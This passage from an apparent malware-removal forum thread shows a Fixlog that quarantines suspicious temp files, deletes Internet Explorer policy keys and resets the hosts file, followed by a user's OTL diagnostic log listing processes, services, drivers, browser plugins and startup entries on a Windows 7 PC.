C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe
EmptyTemp:
Hosts:
End
*****************
Processes closed successfully.
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
"HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => Key deleted successfully.
C:\Users\Ryan\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
C:\Users\Ryan\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.
EmptyTemp: => Removed 485.5 MB temporary data.
The system needed a reboot.
==== End of Fixlog ====
ascot1340
2014-11-09, 22:52
Here is the OTL log in pieces:
OTL logfile created on: 11/8/2014 9:01:25 PM - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\Ryan\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17358)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
7.90 Gb Total Physical Memory | 6.56 Gb Available Physical Memory | 83.07% Memory free
15.79 Gb Paging File | 13.87 Gb Available in Paging File | 87.86% Paging File free
Paging file location(s): ?:\pagefile.sys
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 919.21 Gb Total Space | 829.55 Gb Free Space | 90.25% Space Free | Partition Type: NTFS
Computer Name: RYAN-PC | User Name: Ryan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
========== Processes (SafeList) ==========
PRC - [2014/11/08 14:48:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ryan\Desktop\OTL.exe
PRC - [2014/09/04 04:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2013/09/12 11:06:22 | 001,337,752 | ---- | M] (ESET) -- C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
PRC - [2013/02/15 17:23:34 | 014,731,776 | ---- | M] (GARMIN Corp.) -- C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
PRC - [2012/11/12 20:30:54 | 000,066,560 | ---- | M] (Nalpeiron Ltd.) -- C:\Windows\SysWOW64\nlssrv32.exe
PRC - [2012/05/01 04:36:40 | 005,406,104 | ---- | M] (Sentelic Corporation) -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
PRC - [2012/03/28 09:36:56 | 000,363,800 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
PRC - [2012/03/28 09:36:54 | 000,277,784 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
PRC - [2012/03/28 09:36:50 | 000,128,280 | ---- | M] () -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
PRC - [2012/03/28 09:36:38 | 000,165,144 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
PRC - [2012/03/14 22:59:00 | 002,458,944 | ---- | M] (NVIDIA Corporation) -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
PRC - [2012/02/26 11:01:56 | 000,291,608 | ---- | M] (Intel Corporation) -- C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
========== Modules (No Company Name) ==========
MOD - [2014/01/20 13:17:04 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/01/20 13:16:38 | 001,044,808 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2012/05/03 16:56:44 | 000,089,600 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
MOD - [2012/05/03 11:48:16 | 000,093,696 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
MOD - [2012/04/20 18:11:32 | 000,034,816 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
MOD - [2012/03/15 12:19:26 | 000,241,664 | ---- | M] () -- C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
========== Services (SafeList) ==========
SRV:[b]64bit: - [2014/09/18 20:25:49 | 000,111,616 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/09/12 11:06:22 | 001,337,752 | ---- | M] (ESET) [Auto | Running] -- C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe -- (ekrn)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2012/03/07 04:00:46 | 000,629,984 | ---- | M] (Intel(R) Corporation) [Auto | Running] -- c:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV:64bit: - [2010/11/11 17:00:32 | 000,467,696 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Zune\ZuneWlanCfgSvc.exe -- (ZuneWlanCfgSvc)
SRV:64bit: - [2010/11/11 17:00:32 | 000,306,416 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Zune\WMZuneComm.exe -- (WMZuneComm)
SRV:64bit: - [2010/11/11 16:59:36 | 008,251,120 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Zune\ZuneNss.exe -- (ZuneNetworkSvc)
SRV:64bit: - [2010/09/22 20:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2014/11/08 13:05:25 | 000,267,440 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/09/04 04:50:02 | 000,064,704 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/03/20 17:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012/11/12 20:30:54 | 000,066,560 | ---- | M] (Nalpeiron Ltd.) [Auto | Running] -- C:\Windows\SysWOW64\nlssrv32.exe -- (nlsX86cc)
SRV - [2012/05/14 20:35:25 | 000,276,248 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2012/03/28 09:36:56 | 000,363,800 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/03/28 09:36:54 | 000,277,784 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/03/28 09:36:50 | 000,128,280 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe -- (Intel(R)
SRV - [2012/03/28 09:36:38 | 000,165,144 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2012/03/14 22:59:00 | 002,458,944 | ---- | M] (NVIDIA Corporation) [Auto | Running] -- C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe -- (nvUpdatusService)
SRV - [2012/02/13 13:24:48 | 000,106,144 | ---- | M] (Atheros Commnucations) [Auto | Running] -- C:\Program Files (x86)\Bluetooth Suite\AdminService.exe -- (AtherosSvc)
========== Driver Services (SafeList) ==========
DRV:64bit: - [2014/11/03 18:14:27 | 000,034,808 | ---- | M] () [Kernel | On_Demand | Unknown] -- C:\Windows\SysNative\drivers\TrueSight.sys -- (TrueSight)
DRV:64bit: - [2014/07/17 17:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2014/04/15 16:22:10 | 000,013,344 | ---- | M] (Rsupport Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\vrvd5.sys -- (vrvd5)
DRV:64bit: - [2014/04/11 00:02:54 | 000,156,360 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ESETOlmarikOlmascoCleaner.sys -- (ESETOlmarikOlmascoCleaner)
DRV:64bit: - [2013/11/26 04:07:12 | 000,011,576 | ---- | M] (Samsung Electronics) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\SSPORT.SYS -- (SSPORT)
DRV:64bit: - [2012/12/13 12:50:36 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/05/10 10:11:02 | 014,759,136 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2012/04/02 15:29:42 | 000,035,840 | ---- | M] (Cirrus Logic) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\CSLFDx64.sys -- (CirrusLFD)
DRV:64bit: - [2012/03/14 22:59:00 | 000,028,992 | ---- | M] (NVIDIA Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\nvpciflt.sys -- (nvpciflt)
DRV:64bit: - [2012/03/07 18:43:08 | 000,014,336 | ---- | M] (Primax Electronics Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\ViWDM.sys -- (ViWDM)
DRV:64bit: - [2012/03/01 20:17:24 | 003,545,088 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2012/03/01 01:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2012/02/26 14:01:00 | 000,788,760 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3xhc.sys -- (iusb3xhc)
DRV:64bit: - [2012/02/26 14:01:00 | 000,356,120 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\iusb3hub.sys -- (iusb3hub)
DRV:64bit: - [2012/02/26 14:01:00 | 000,016,152 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iusb3hcs.sys -- (iusb3hcs)
DRV:64bit: - [2012/02/13 13:34:12 | 000,550,560 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btfilter.sys -- (BtFilter)
DRV:64bit: - [2012/02/13 13:33:24 | 000,280,992 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_rcp.sys -- (BTATH_RCP)
DRV:64bit: - [2012/02/13 13:33:12 | 000,068,256 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_lwflt.sys -- (BTATH_LWFLT)
DRV:64bit: - [2012/02/13 13:32:42 | 000,167,584 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_hcrp.sys -- (BTATH_HCRP)
DRV:64bit: - [2012/02/13 13:32:24 | 000,036,000 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_flt.sys -- (AthBTPort)
DRV:64bit: - [2012/02/13 13:32:12 | 000,030,368 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_bus.sys -- (BTATH_BUS)
DRV:64bit: - [2012/02/13 13:31:54 | 000,110,752 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_avdt.sys -- (btath_avdt)
DRV:64bit: - [2012/02/13 13:31:42 | 000,339,616 | ---- | M] (Atheros) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\btath_a2dp.sys -- (BTATH_A2DP)
DRV:64bit: - [2012/02/03 08:01:20 | 000,677,480 | ---- | M] (Realtek ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2012/02/01 03:16:40 | 000,568,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2011/11/09 12:04:14 | 000,060,184 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:64bit: - [2011/08/17 01:27:06 | 000,251,496 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\RtsUStor.sys -- (RSUSBSTOR)
DRV:64bit: - [2011/05/17 15:44:46 | 000,044,480 | ---- | M] (http://libusb-win32.sourceforge.net) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\libusb0.sys -- (libusb0)
DRV:64bit: - [2011/03/11 01:41:12 | 000,107,904 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2011/03/11 01:41:12 | 000,027,008 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2011/02/16 16:53:00 | 000,014,464 | ---- | M] (Western Digital Technologies) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wdcsam64.sys -- (WDC_SAM)
DRV:64bit: - [2010/11/20 22:24:33 | 000,059,392 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2010/11/20 22:23:47 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/11/20 22:23:47 | 000,031,232 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:64bit: - [2009/07/13 20:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 20:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 20:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 18:21:48 | 000,038,400 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\tpm.sys -- (TPM)
DRV:64bit: - [2009/06/10 15:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 15:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 15:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 15:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV - [2009/07/13 20:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
========== Standard Registry (SafeList) ==========
========== Internet Explorer ==========
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope =
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 76 D3 6B 0F 2F C9 CC 01 [binary data]
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = Preserve
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 7E F7 8E 2F 6E F8 CF 01 [binary data]
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
========== FireFox ==========
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.71.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3502.0922: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=15.4.3555.0308: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.0.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\@videolan.org/vlc,version=2.1.3: C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/GoogleTalkPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF - HKCU\Software\MozillaPlugins\@talk.google.com/O1DPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
O1 HOSTS File: ([2014/11/08 13:01:05 | 000,000,035 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (CIESpeechBHO Class) - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [AthBtTray] C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe (Atheros Commnucations)
O4:64bit: - HKLM..\Run: [AtherosBtStack] C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe (Atheros Commnucations)
O4:64bit: - HKLM..\Run: [CDAServer] C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe ()
O4:64bit: - HKLM..\Run: [FspUip] C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe (Sentelic Corporation)
O4:64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4:64bit: - HKLM..\Run: [SRS Premium Sound HD] C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe (SRS Labs, Inc.)
O4 - HKLM..\Run: [Adobe Reader Speed Launcher] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe (Adobe Systems Incorporated)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [OSD Utility] C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe (VIZIO Computer Inc.)
O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation)
O4 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001..\Run: [ANT Agent] C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe (GARMIN Corp.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O7 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O7 - HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O9 - Extra 'Tools' menuitem : Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - Reg Error: Key error. File not found
O9 - Extra 'Tools' menuitem : Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000010 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000010 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13 - gopher Prefix: missing
O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab (Reg Error: Key error.)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.200.1
